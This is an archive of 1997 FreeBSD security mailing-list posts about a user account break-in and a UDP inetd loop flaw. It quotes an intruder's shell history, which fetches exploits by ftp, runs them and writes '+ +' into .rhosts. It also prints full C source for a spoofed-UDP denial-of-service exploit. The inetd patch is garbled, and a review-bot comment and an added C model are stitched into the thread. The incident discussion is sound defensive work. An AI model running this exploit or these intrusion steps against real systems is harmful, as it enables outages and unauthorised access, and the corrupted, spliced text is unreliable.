From owner-freebsd-security Fri Jun 20 09:33:38 1997
Message-ID: <33AAB0CA.2781E494@fsl.noaa.gov>
Date: Fri, 20 Jun 1997 10:33:14 -0600
From: Sean Kelly
Organization: CIRA/NOAA
To: freebsd-security@freebsd.org
Subject: Attempt to compromise root

I'm running FreeBSD 2.2-RELEASE. One of my users (okay, she's my wife) had submitted a crontab which had a bad MAILTO line in it, resulting in a MAILER-DAEMON message being sent to me every time the job was run ... and the job was set to run every minute:

    * * * * * id

When I asked her, she said she didn't know what a crontab file was. That's when I suspected foul play. The wtmp indicated that she had logged in from a remote site early in the morning when I *know* :-) she was asleep. Then we found the following in her .history file:

--------------------------------------------------------------------
rm *
ftp the.art.of.sekurity.org
more /etc/passwd
ls
cc -o gr1 bsd1.c
rm bsd1.c
rm gr1
cc -o gr1 bsd2.c
chmod 700 gr1
./gr1
./gr1 mary root
rm gr1
ls -al
cc -o gr bsd3.c
chmod 700 gr
./gr
ls
rm bsd2.c
rm bsd3.c
ls
rm gr
cc -o gr bsd4.c
ls -al
./gr
rm bsd4.c
gr
cc -o gr bsd5.c
ls -al
./gr
id
rm gr
rm bsd5
rm bsd5.c
cc -o gr bsd6.c
./gr
rm bsd6.c
rm gr
ls -al
cc -o gr bsd7.c
ls -al
rm bsd7.c
ftp the.art.of.sekurity.org
ls
cc -o jump jump.c
ls -al
./jump
id
./jump
rm *
uname -a
cd /bin
ls -al | more
ls -al | grep wheel
cd ..
ls -al
cd etc
ls -al | more
more security
ls -al mast*
cd /
cat .rhosts
cd
cat .rhosts
ls -al
ls -al | grep drwx
telnet localhost 25
cd /tmp.tmp
cd /tmp/.tmp
ftp the.art.of.sekurity.org
ls -al
cc -o gr bsd1.c
more bsd1.c
rm gr
mv bsd1.c egg.c
cc -s -o /tmp/.tmp/egg -O egg.c
EDITOR='/tmp/.tmp/egg -1259'
export EDITOR
EDITOR='/tmp/.tmp/egg -1259' e ; xport EDITOR
EDITOR='/tmp/.tmp/egg -1259' ; export EDITOR
more bsd1.c
ls -al
more egg.c
crontab -e
ls
more egg.c
EDITOR='/tmp/.tmp/egg -1259' ; export EDITOR
bash
whereis bash
/usr/ports/shells/bash
ls -al /usr/ports/shells/bash
/bin/sh
ls -al
rm egg*
pico bsd2.c
more bsd2.c
mv bsd2.c bsd.sh
./bsd.sh
chmod 700 bsd.sh
./bsd.sh
cd /tmp
ls sh*
cd .tmp
ls -al
rm bsd.sh
cp bsd.one bsd.c
vi bsd.c
ls
rm bsd.one
rm bsd.c
ls
cc -o gr bsd3.c
ls
rm bsd3.c
ftp the.art.of.sekurity.org
ls
tar xfv bsd.tar
mv grind.c ohjoy.c sploit ..
cd ..
chmod 700 sploit
chmod 644 *.c
./sploit
id
kill ^1
kill %1
rm ohj*
rm grind*
rm sploit*
ls
rmdir .tmp
cd
ls -al
rm -rf /tmp/.tmp
whereis larn
cd /tmp
mkdir tmp
cd tmp
ftp the.art.of.sekurity.org
ls
cc -o fuck bsd1.c
./fuck
ls
rm fuck
cc -o fuck bsd2.c
./fuck
rm fuck
cc -o fuck bsd3.c
ls
ls /usr/bin/crontab
ls -al /usr/bin/crontab
cc -o fuck bsd4.c
./fuck
./fuck lp1
./fuck bamboo
ls
rm fuck
more bsd1.sh
./bsd1.sh
chmod 700 bsd1.sh
./bsd1.sh
more bsd2.sh
chmod 700 bsd2.
chmod 700 bsd2.*
./bsd2.sh
ls -al
rm *
cd ..
rmdir .tmp
cd
rm -rf /tmp/tmp
cd /etc
cat hosts
cd /home
ls -al
cd rosemary/
ls
ls -al
find . -name .rhosts -print
ypcat passwd
w
cd /etc
more passwd
cd /u
ls -al
pwd
cd ..
ls
ls -al
echo "+ +" >> .rhosts
echo "+ +" > .rhosts
ls -al | more
exit
cd /home
ls
cd rosemary/
ls
ls -al
cd
ls -al | more
rm .history
exit
--------------------------------------------------------------------

Luckily, the idiot didn't realize that the .history file is updated after logout, and we got a record of most of his/her activities.
I've tried ftp'ing to the.art.of.sekurity.org and have been successful only once, but haven't been able to transfer any files. sekurity.org appears registered to an organization called "Insekurity, Inc.".

I checked config files, .rhosts, system binaries, and everything seems intact, so I don't think root was compromised. However, I don't have an md5/mtree digest of everything so I'm not 100% sure. Next I'll go back to source media and do some comparisons.

So, two issues:

(1) Does this type of attack seem familiar? Is anyone aware of "sekurity.org" and what their purpose is? Is there someone there to whom I should complain? (Doubtful, as it appears the reason that ftp site exists is to provide a repository of cracking code.)

(2) Can we get an option during the FreeBSD install to generate the md5/mtree digest? Naturally, I read up on this feature after the attack, but after an attack it's too late.

-- 
Sean Kelly
NOAA Forecast Systems Laboratory
Boulder Colorado USA

From owner-freebsd-security Fri Jun 20 11:21:29 1997
To: Sean Kelly
Cc: freebsd-security@FreeBSD.ORG
Subject: Re: Attempt to compromise root
In-Reply-To: Your message of "Fri, 20 Jun 1997 10:33:14 MDT." <33AAB0CA.2781E494@fsl.noaa.gov>
Date: Fri, 20 Jun 1997 11:20:48 -0700
Message-ID: <25515.866830848@time.cdrom.com>
From: "Jordan K. Hubbard"

> I've tried ftp'ing to the.art.of.sekurity.org and have been successful
> only once, but haven't been able to transfer any files. sekurity.org
> appears registered to an organization called "Insekurity, Inc.".

I've got the contents of the site mirrored now and I'll have a look through some of it as I have time. It's possible that there are some genuine compromises here, but it's hard to say.

> (1) Does this type of attack seem familiar? Is anyone aware of

Yes, but then a good 90% of the attacks I've seen are using somebody's "rootkit" (e.g. the attackers rarely understand the mechanics of what they're doing - it's all done by rote) and so in saying that it's familiar, all I'm saying is that it's distressingly typical. :(

> "sekurity.org" and what their purpose is? Is there someone there to
> whom I should complain? (Doubtful, as it appears the reason that ftp
> site exists is to provide a repository of cracking code.)

There are dozens of such sites around - I doubt you'd get much more than laughed at if you tried to make an issue of it.

> (2) Can we get an option during the FreeBSD install to generate the
> md5/mtree digest? Naturally, I read up on this feature after the

You mean of the exact tree you've installed? Hmmmm. There are the foo.mtree files in each distribution, but is there some reason why that wouldn't be enough? The bin.mtree file in particular pretty much covers any of the binaries you'd probably be interested in...
Jordan

From owner-freebsd-security Fri Jun 20 12:09:31 1997
Date: Fri, 20 Jun 1997 15:09:16 -0400 (EDT)
From: Garrett Wollman
Message-Id: <199706201909.PAA02705@khavrinen.lcs.mit.edu>
To: Sean Kelly
Cc: freebsd-security@FreeBSD.ORG
Subject: Attempt to compromise root
In-Reply-To: <33AAB0CA.2781E494@fsl.noaa.gov>
References: <33AAB0CA.2781E494@fsl.noaa.gov>

< said:

> (2) Can we get an option during the FreeBSD install to generate the
> md5/mtree digest? Naturally, I read up on this feature after the
> attack, but after an attack it's too late.

There already is such a thing. Every recent release includes mtree files with md5 digests of everything included in the distribution. See the FTP site or CD-ROM.

-GAWollman

-- 
Garrett A. Wollman    | O Siem / We are all family / O Siem / We're all the same
wollman@lcs.mit.edu   | O Siem / The fires of freedom
Opinions not those of | Dance in the burning flame
MIT, LCS, CRS, or NSA | - Susan Aglukark and Chad Irschick

From owner-freebsd-security Fri Jun 20 13:11:24 1997
Message-Id: <3.0.2.32.19970620160012.008d12c0@eyelab.msu.edu>
Date: Fri, 20 Jun 1997 16:00:12 -0700
To: freebsd-security@FreeBSD.ORG
From: Gary Schrock
Subject: Re: Attempt to compromise root
In-Reply-To: <25515.866830848@time.cdrom.com>

At 11:20 AM 6/20/97 -0700, you wrote:
>> (2) Can we get an option during the FreeBSD install to generate the
>> md5/mtree digest? Naturally, I read up on this feature after the
>
>You mean of the exact tree you've installed? Hmmmm. There are
>the foo.mtree files in each distribution, but is there some reason
>why that wouldn't be enough? The bin.mtree file in particular
>pretty much covers any of the binaries you'd probably be interested
>in...

During the install might not be as useful as during the make world process. I know I've put together the mtree information for systems that I look after, and having to do it anytime I update a file is a little annoying (in general I forget to update it until the nightly run is done and it complains that things are different than what it expects). Another possibility (and I don't know how practical this might be) is to incorporate mtree into the normal nightly security check.

Gary Schrock
root@eyelab.msu.edu

From owner-freebsd-security Fri Jun 20 13:45:21 1997
Date: Fri, 20 Jun 1997 16:45:01 -0400 (EDT)
From: Garrett Wollman
Message-Id: <199706202045.QAA02968@khavrinen.lcs.mit.edu>
To: Garrett Wollman
Cc: freebsd-security@FreeBSD.ORG
Subject: Attempt to compromise root
In-Reply-To: <199706201909.PAA02705@khavrinen.lcs.mit.edu>
References: <33AAB0CA.2781E494@fsl.noaa.gov> <199706201909.PAA02705@khavrinen.lcs.mit.edu>

> There already is such a thing. Every recent release includes mtree
> files with md5 digests of everything included in the distribution.
> See the FTP site or CD-ROM.

I forgot to mention....

Probably the release engineer should generate and publish a digital signature of the files and the distribution's associated CHECKSUMS.MD5. Actually, the installation system ought to be able itself to at least verify the MD5s of the tarballs it retrieves.

-GAWollman

From owner-freebsd-security Fri Jun 20 14:47:33 1997
From: Daniel Baker
Message-Id: <199706202138.QAA26252@hobbes.cuckoo.com>
Subject: Re: Attempt to compromise root
To: jkh@time.cdrom.com (Jordan K. Hubbard)
Date: Fri, 20 Jun 1997 16:38:28 -0500 (CDT)
Cc: freebsd-security@FreeBSD.ORG
In-Reply-To: <25515.866830848@time.cdrom.com> from "Jordan K. Hubbard" at Jun 20, 97 11:20:48 am

> > I've tried ftp'ing to the.art.of.sekurity.org and have been successful
> > only once, but haven't been able to transfer any files. sekurity.org
> > appears registered to an organization called "Insekurity, Inc.".
>
> I've got the contents of the site mirrored now and I'll have a look
> through some of it as I have time. It's possible that there are
> some genuine compromises here, but it's hard to say.

I attempted to do the same, and it appears that they are getting kinda paranoid from all the recent accesses:

jeep % ftp the.art.of.sekurity.org
Connected to the.art.of.sekurity.org.
220 the.art.of FTP server (Version wu-2.4(1) Tue Aug 8 15:50:43 CDT 1995) ready.
Name (the.art.of.sekurity.org:dbaker): ftp
530-
530-
530-
530- It seems you have taken an interest in this machine
530- and/or its contents, if this is a general interest in the
530- domain sekurity.org you can send a request for service to
530- root@sekurity.org... If your interest is only in this machine
530- you can mail zen@sekurity.org... If you are specifically denied
530- access to this machine DO NOT WHINE ABOUT IT, I dont want to
530- listen to it...
530 User ftp access denied..
ftp: Login failed.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp>

Interesting....

Daniel

-- 
Daniel Baker (dbaker@cuckoo.com)
Chief Technology and Executive Officer -- CuckooNet!
(http://www.cuckoo.com)

From owner-freebsd-security Fri Jun 20 16:01:49 1997
From: Daniel Baker
Message-Id: <199706202301.SAA27594@hobbes.cuckoo.com>
Subject: Re: Attempt to compromise root
To: vazquez@IQM.Unicamp.BR (Pedro A M Vazquez)
Date: Fri, 20 Jun 1997 18:01:03 -0500 (CDT)
Cc: freebsd-security@freebsd.org
In-Reply-To: <199706202221.TAA01514@kalypso.iqm.unicamp.br> from "Pedro A M Vazquez" at Jun 20, 97 07:21:07 pm

> It still working for me (second try):
>
> ftp the.art.of.sekurity.org
> Connected to the.art.of.sekurity.org.
> 220 the.art.of FTP server (Version wu-2.4(1) Tue Aug 8 15:50:43 CDT 1995) ready.
> Name (the.art.of.sekurity.org:vazquez): anonymous
> 331 Guest login ok, send your complete e-mail address as password.
> Password:
> 230 Guest login ok, access restrictions apply.
> Remote system type is UNIX.
> Using binary mode to transfer files.

I still can't ftp in. I imagine he disabled access for .com and .net (or something like that) and since you're in .br, you wouldn't be denied access.

[snip]

Thanks

Daniel

[snip]

-- 
Daniel Baker (dbaker@cuckoo.com)
Chief Technology and Executive Officer -- CuckooNet!
(http://www.cuckoo.com)

From owner-freebsd-security Fri Jun 20 18:17:21 1997
Message-ID: <19970620181753.20772@hydrogen.nike.efn.org>
Date: Fri, 20 Jun 1997 18:17:53 -0700
From: John-Mark Gurney
To: Garrett Wollman
Cc: freebsd-security@FreeBSD.ORG
Subject: Re: Attempt to compromise root
References: <33AAB0CA.2781E494@fsl.noaa.gov> <199706201909.PAA02705@khavrinen.lcs.mit.edu> <199706202045.QAA02968@khavrinen.lcs.mit.edu>
In-Reply-To: <199706202045.QAA02968@khavrinen.lcs.mit.edu>; from Garrett Wollman on Fri, Jun 20, 1997 at 04:45:01PM -0400
Organization: Cu Networking
X-Operating-System: FreeBSD 2.2.1-RELEASE i386

Garrett Wollman scribbled this message on Jun 20:
> > There already is such a thing. Every recent release includes mtree
> > files with md5 digests of everything included in the distribution.
> > See the FTP site or CD-ROM.
>
> I forgot to mention....
>
> Probably the release engineer should generate and publish a digital
> signature of the files and the distribution's associated
> CHECKSUMS.MD5. Actually, the installation system ought to be able
> itself to at least verify the MD5s of the tarballs it retrieves.

actually... I've submitted patches to Jordan that will add a -verify flag to the install.sh scripts... I just don't have the resources to build a release, so I can't test the patches...
-- 
John-Mark Gurney                              Modem/FAX: +1 541 683 6954
Cu Networking

Live in Peace, destroy Micro$oft, support free software, run FreeBSD

From owner-freebsd-security Fri Jun 20 18:33:55 1997
Date: Fri, 20 Jun 1997 18:31:52 -0700 (PDT)
From: Chris Coleman
To: Daniel Baker
Cc: Pedro A M Vazquez, freebsd-security@FreeBSD.ORG
Subject: Re: Attempt to compromise root
In-Reply-To: <199706202301.SAA27594@hobbes.cuckoo.com>

I am in the .us domain and you are right, it let me in just fine. I looked around a little and found the standard linux-root-kit and a few other interesting programs. I'll have to be more careful.

Christopher J. Coleman (chris@aries.bb.cc.wa.us)
Computer Support Technician I             (509)-766-8873
Big Bend Community College                Internet Instructor
FreeBSD Book Project: http://vinyl.quickweb.com/~chrisc/book.html
Disclaimer: Even Though it has My Name on it, Doesn't mean I said it.

On Fri, 20 Jun 1997, Daniel Baker wrote:

> > It still working for me (second try):
> >
> > ftp the.art.of.sekurity.org
> > Connected to the.art.of.sekurity.org.
> > 220 the.art.of FTP server (Version wu-2.4(1) Tue Aug 8 15:50:43 CDT 1995) ready.
> > Name (the.art.of.sekurity.org:vazquez): anonymous
> > 331 Guest login ok, send your complete e-mail address as password.
> > Password:
> > 230 Guest login ok, access restrictions apply.
> > Remote system type is UNIX.
> > Using binary mode to transfer files.
>
> I still can't ftp in. I imagine he disabled access for .com and .net (or
> something like that) and since you're in .br, you wouldn't be denied
> access.
>
> [snip]
>
> Thanks
>
> Daniel
>
> [snip]
>
> -- 
> Daniel Baker (dbaker@cuckoo.com)
> Chief Technology and Executive Officer -- CuckooNet!
> (http://www.cuckoo.com)
>

From owner-freebsd-security Sat Jun 21 21:23:10 1997
Date: Sun, 22 Jun 1997 14:22:49 +1000 (EST)
From: "Daniel O'Callaghan"
To: freebsd-security@freebsd.org
Subject: Simple TCP service can hang a system (fwd)

---------- Forwarded message ----------
Date: Sat, 21 Jun 1997 23:58:16 +0200
From: Willy TARREAU
To: BUGTRAQ@NETSPACE.ORG
Subject: Simple TCP service can hang a system

Hi !

I've noticed that inetd doesn't check the source port for the request to UDP simple services (echo, time, chargen, daytime). This means it is possible to build a packet which will look like it comes from one of these ports, to one of these ports. In this case, each UDP response from the simple service will generate a new request to the source port and the system or network can be quickly overloaded.

To test this, I've written a program, let's say an exploit... It completely builds a UDP packet from RAW IP. You just have to specify which IP and PORT you want for source and destination, and then look at the result.

On my Linux 2.0.29, inetd goes to 99% CPU when source/dest are the same machine with any of these 4 ports. I tested Netware Client 32 for DOS/Windows, and it simply hangs. Not tested yet on Win95/NT/Netware...

Concerning Linux, I've patched inetd to prevent it from replying to requests coming from a port below one specified in the source (I chose 128).

Here comes the exploit, and next, the patch for inetd (inetd from NetKit-0.09).

Willy Tarreau

-- 
+---------------+------------------------+--------------------------------+
| Willy Tarreau | tarreau@aemiaif.ibp.fr | http://www-miaif.ibp.fr/willy/ |
| Magistere d'Informatique Appliquee de l'Ile de France (MIAIF), promo 97 |
| DEA A.S.I.M.E. | Universite Pierre et Marie Curie (Paris 6), FRANCE     |
+-----------------+-------------------------------------------------------+

-------------------- UDP simple services exploit --------------------------

/* PingPong. 970621 by Willy TARREAU
   This program sends a spoofed UDP packet to the host you want to test.
   You just have to choose source address/port and destination address/port.
   There are two main uses of this program:
   - generate a packet which will make inetd reply to itself continuously
     on a given host. This will slow down a system because inetd will use
     most of the CPU to reply to its own requests.
   - generate a packet which will initiate a "ping pong" between two
     machines. In this case, this will consume network bandwidth for nothing.
   On Linux, inetd is fooled on these internal ports:
      7: echo
     13: daytime
     19: chargen
     37: time
   Netware Client 32 hangs the workstations with 7 or 19. Others not tested yet.
   Not tested yet on Netware nor WinNt nor Win95.
   As this program uses RAW sockets, you need to run it as root.
*/

#include
#include
#include
#include
#include
#include
#include
#include
#include

struct sockaddr addrfrom;
struct sockaddr addrto;
int s;
u_char outpack[65536];
struct iphdr *ip;
struct udphdr *udp;

main(int argc, char **argv)
{
    struct sockaddr_in *from;
    struct sockaddr_in *to;
    struct protoent *proto;
    int i;
    char *src,*dest;
    int srcp, destp;
    int packetsize,datasize;

    fprintf(stderr,"PingPong 1.0 - 970621 by Willy Tarreau \n");
    fprintf(stderr,"<<< PLEASE USE THIS FOR TESTS ONLY AND WITH ADMINISTRATORS' AUTHORIZATION >>>\n\n");
    if (argc!=5) {
        fprintf(stderr,"wrong arg count.\nUsage: pingpong src_addr src_port dst_addr dst_port\n");
        fprintf(stderr,"src_addr and dst_addr must be given as IP addresses (xxx.xxx.xxx.xxx)\n");
        fprintf(stderr,"Note that it often works with 127.0.0.1 as src_addr !\n");
        exit(2);
    }
    src=argv[1]; srcp=atoi(argv[2]);
    dest=argv[3]; destp=atoi(argv[4]);

    if (!(proto = getprotobyname("raw"))) {
        perror("getprotobyname(raw)");
        exit(2);
    }
    /* "raw" should be 255 */
    if ((s = socket(AF_INET, SOCK_RAW, proto->p_proto)) < 0) {
        perror("socket");
        exit(2);
    }

    memset(&addrfrom, 0, sizeof(struct sockaddr));
    from = (struct sockaddr_in *)&addrfrom;
    from->sin_family = AF_INET;
    from->sin_port=htons(srcp);
    if (!inet_aton(src, &from->sin_addr)) {
        fprintf(stderr,"Incorrect address for 'from': %s\n",src);
        exit(2);
    }

    memset(&addrto, 0, sizeof(struct sockaddr));
    to = (struct sockaddr_in *)&addrto;
    to->sin_family = AF_INET;
    to->sin_port=htons(destp);
    if (!inet_aton(dest, &to->sin_addr)) {
        fprintf(stderr,"Incorrect address for 'to': %s\n",dest);
        exit(2);
    }

    packetsize=0;
    /* let's build a complete UDP packet from scratch */
    ip=(struct iphdr *)outpack;
    ip->version=4;      /* IPv4 */
    ip->ihl=5;          /* 5 words IP header */
    ip->tos=0;
    ip->id=0;
    ip->frag_off=0;
    ip->ttl=0x40;
    if (!(proto = getprotobyname("udp"))) {
        perror("getprotobyname(udp)");
        exit(2);
    }
    /* "udp" should be 17 */
    ip->protocol=proto->p_proto;    /* udp */
    ip->check=0;        /* null checksum, will be automatically computed by the kernel */
    ip->saddr=from->sin_addr.s_addr;
    ip->daddr=to->sin_addr.s_addr;
    /* end of ip header */
    packetsize+=ip->ihl<<2;

    /* udp header */
    udp=(struct udphdr *)((int)outpack + (int)(ip->ihl<<2));
    udp->source=htons(srcp);
    udp->dest=htons(destp);
    udp->check=0;       /* ignore checksum */
    packetsize+=sizeof(struct udphdr);
    /* end of udp header */

    /* add udp data here if you like */
    for (datasize=0;datasize<8;datasize++) {
        outpack[packetsize+datasize]='A'+datasize;
    }
    packetsize+=datasize;
    udp->len=htons(sizeof(struct udphdr)+datasize);
    ip->tot_len=htons(packetsize);

    if (sendto(s, (char *)outpack, packetsize, 0, &addrto, sizeof(struct sockaddr))==-1) {
        perror("sendto");
        exit(2);
    }
    printf("packet sent !\n");
    close(s);
    printf("end\n");
    exit(0);
}

-------------------- patch for inetd --------------------

--- inetd.c	Sat Nov 23 19:44:12 1996
+++ inetd-fix.c	Sat Jun 21 23:38:09 1997
@@ -170,6 +170,7 @@
 #define TOOMANY 40 /* don't start more than TOOMANY */
 #define CNT_INTVL 60 /* servers in CNT_INTVL sec. */
 #define RETRYTIME (60*10) /* retry after bind or server fail */
+#define MINSRCPORT 128 /* below this port, UDP requests are ignored */
 #define SIGBLOCK (sigmask(SIGCHLD)|sigmask(SIGHUP)|sigmask(SIGALRM))
@@ -1271,6 +1272,8 @@
 size = sizeof(sa);
 if ((i = recvfrom(s, buffer, sizeof(buffer), 0, &sa, &size)) < 0)
 return;
+ if (ntohs(((struct sockaddr_in *)(&sa))->sin_port)sin_port)= LINESIZ) bcopy(rs, text, LINESIZ); else {
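Review bot: the added line in the `@@ -1271,6 +1272,8 @@` hunk is truncated in this copy (`->sin_port)sin_port)= LINESIZ) bcopy(rs, text, LINESIZ); else {` runs the port comparison, its `return;` and unrelated context together), so the test against MINSRCPORT cannot be reviewed or applied as posted; the hunk needs to be re-sent intact. The same source-port test is then pasted into each internal UDP service by hand (the next hunk at 1423 repeats it); one helper taking the `struct sockaddr *` from `recvfrom()` and answering whether the peer port is below MINSRCPORT, called from echo, daytime, chargen and time alike, would keep the four services consistent and make a missed one obvious.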
@@ -1423,6 +1429,10 @@
 size = sizeof(sa);
 if (recvfrom(s, (char *)&result, sizeof(result), 0, &sa, &size) < 0)
 return;
+
+ if (ntohs(((struct sockaddr_in *)(&sa))->sin_port)sin_port)

From owner-freebsd-security Sat Jun 21 22:27:35 1997
Date: Sun, 22 Jun 1997 01:27:20 -0400 (EDT)
From: Garrett Wollman
Message-Id: <199706220527.BAA09678@khavrinen.lcs.mit.edu>
To: "Daniel O'Callaghan"
Cc: freebsd-security@FreeBSD.ORG
Subject: Simple TCP service can hang a system (fwd)

< said:

> I've noticed that inetd doesn't check the source port for the request
> to UDP simple services (echo, time, chargen, daytime).

This was fixed in FreeBSD about two or three years ago...

-GAWollman

From owner-freebsd-security Sat Jun 21 23:07:20 1997
From: Michael Smith
Message-Id: <199706220607.PAA11138@genesis.atrad.adelaide.edu.au>
Subject: Re: Simple TCP service can hang a system (fwd)
In-Reply-To: from Daniel O'Callaghan at "Jun 22, 97 02:22:49 pm"
To: danny@panda.hilink.com.au (Daniel O'Callaghan)
Date: Sun, 22 Jun 1997 15:37:03 +0930 (CST)
Cc: freebsd-security@FreeBSD.ORG

Daniel O'Callaghan stands accused of saying:
>
> I've noticed that inetd doesn't check the source port for the request
> to UDP simple services (echo, time, chargen, daytime).

(note that this is Linux). FreeBSD ships with these disabled:

# "Small servers" -- used to be standard on, but we're more conservative
# about things due to Internet security concerns.  Only turn on what you
# need.
#
#daytime   stream  tcp     nowait  root    internal
#daytime   dgram   udp     wait    root    internal
#time      stream  tcp     nowait  root    internal
#time      dgram   udp     wait    root    internal
#echo      stream  tcp     nowait  root    internal
#echo      dgram   udp     wait    root    internal
#discard   stream  tcp     nowait  root    internal
#discard   dgram   udp     wait    root    internal
#chargen   stream  tcp     nowait  root    internal
#chargen   dgram   udp     wait    root    internal

... so if you turn them on, you ought to understand this already 8)

-- 
]] Mike Smith, Software Engineer                    msmith@gsoft.com.au [[
]] Genesis Software                                genesis@gsoft.com.au [[
]] High-speed data acquisition and          (GSM mobile) 0411-222-496 [[
]] realtime instrument control.                 (ph) +61-8-8267-3493 [[
]] Unix hardware collector.            "Where are your PEZ?"  The Tick [[
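The ping-pong Willy Tarreau describes and the source-port check his inetd patch adds, modelled as an added example that is not code from the thread, from inetd or from FreeBSD: two hosts' internal UDP services answer each other indefinitely until the patched check drops the spoofed request, while an ordinary client is still answered. Host numbers are constructed labels, and MINSRCPORT reuses the patch's value of 128.

```c
#include <stdio.h>
#include <stdint.h>
#include <string.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>

/* Threshold reused from the posted inetd patch. */
#define MINSRCPORT 128

/* The four internal UDP "simple services" named in the post. */
#define PORT_ECHO     7
#define PORT_DAYTIME 13
#define PORT_CHARGEN 19
#define PORT_TIME    37

static int is_simple_service(uint16_t port)
{
    return port == PORT_ECHO || port == PORT_DAYTIME ||
           port == PORT_CHARGEN || port == PORT_TIME;
}

/* The test the patch inserts after recvfrom(): read the peer's port from
 * the sockaddr (network byte order) and refuse anything below MINSRCPORT. */
int udp_source_allowed(const struct sockaddr *sa)
{
    const struct sockaddr_in *sin = (const struct sockaddr_in *)sa;
    return ntohs(sin->sin_port) >= MINSRCPORT;
}

/* A model datagram. Hosts are constructed integer labels, not addresses;
 * ports are in host byte order. */
struct dgram {
    int      src_host;
    uint16_t src_port;
    int      dst_host;
    uint16_t dst_port;
};

/* Model of inetd on dst_host receiving `in`. Each simple service answers
 * every datagram it gets, so the reply is a datagram back to whatever
 * source the request claimed. Returns 1 and fills `out` when a reply is
 * sent, 0 when the datagram is dropped (no service, or the check fails). */
int inetd_reply(const struct dgram *in, struct dgram *out, int enforce_min_port)
{
    struct sockaddr_in sa;

    if (!is_simple_service(in->dst_port))
        return 0;                          /* nothing listening there */

    memset(&sa, 0, sizeof sa);
    sa.sin_family = AF_INET;
    sa.sin_port   = htons(in->src_port);   /* as recvfrom() would fill it */
    if (enforce_min_port && !udp_source_allowed((struct sockaddr *)&sa))
        return 0;                          /* patched behaviour: ignore it */

    out->src_host = in->dst_host;
    out->src_port = in->dst_port;
    out->dst_host = in->src_host;
    out->dst_port = in->src_port;          /* reply goes to the claimed port */
    return 1;
}

/* Inject one datagram and follow the replies from host to host, counting
 * inetd replies until traffic dies out or `limit` hops are reached.
 * Returning `limit` means the exchange never ends on its own. */
int count_exchanges(struct dgram first, int enforce_min_port, int limit)
{
    struct dgram cur = first, next;
    int n = 0;

    while (n < limit && inetd_reply(&cur, &next, enforce_min_port)) {
        n++;
        cur = next;
    }
    return n;
}

int main(void)
{
    /* Spoofed: claims to come from host 1's chargen port, sent to host 2's echo. */
    struct dgram spoofed = { 1, PORT_CHARGEN, 2, PORT_ECHO };
    /* Ordinary client on an ephemeral port asking host 2's echo service. */
    struct dgram client  = { 3, 40000, 2, PORT_ECHO };

    printf("spoofed, unpatched inetd: %d replies (limit reached, no end)\n",
           count_exchanges(spoofed, 0, 1000));
    printf("spoofed, patched inetd:   %d replies\n", count_exchanges(spoofed, 1, 1000));
    printf("client,  patched inetd:   %d reply\n", count_exchanges(client, 1, 1000));
    return 0;
}
```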